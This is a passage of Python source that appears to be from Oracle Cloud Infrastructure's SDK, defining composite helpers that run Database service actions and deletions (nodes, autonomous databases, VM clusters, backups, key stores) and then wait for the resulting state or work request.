def db_node_action_and_wait_for_state(self, db_node_id, action, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.db_node_action` and waits for the :py:class:`~oci.database.models.DbNode` acted upon
to enter the given state(s).
:param str db_node_id: (required)
The database node `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str action: (required)
The action to perform on the DB Node.
Allowed values are: "STOP", "START", "SOFTRESET", "RESET"
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbNode.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.db_node_action`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.db_node_action(db_node_id, action, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_node(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_autonomous_vm_cluster_and_wait_for_work_request(self, autonomous_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_autonomous_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_autonomous_vm_cluster(autonomous_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_backup_and_wait_for_work_request(self, backup_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_backup` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str backup_id: (required)
The backup `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_backup(backup_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_backup_destination_and_wait_for_state(self, backup_destination_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_backup_destination`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_backup_destination(backup_destination_id)
operation_result = None
try:
operation_result = self.client.delete_backup_destination(backup_destination_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_cloud_exadata_infrastructure_and_wait_for_work_request(self, cloud_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_cloud_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_cloud_vm_cluster_and_wait_for_work_request(self, cloud_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_cloud_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_cloud_vm_cluster(cloud_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_database_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_database(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_database_software_image_and_wait_for_work_request(self, database_software_image_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_database_software_image` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_software_image_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_database_software_image(database_software_image_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_db_home_and_wait_for_work_request(self, db_home_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_db_home` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_db_home(db_home_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_container_database_and_wait_for_work_request(self, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_container_database(external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_database_connector_and_wait_for_work_request(self, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_database_connector` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_database_connector(external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_non_container_database_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_non_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_non_container_database(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_pluggable_database_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_pluggable_database(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_key_store_and_wait_for_state(self, key_store_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_key_store(key_store_id)
operation_result = None
try:
operation_result = self.client.delete_key_store(key_store_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_vm_cluster_and_wait_for_work_request(self, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_vm_cluster(vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
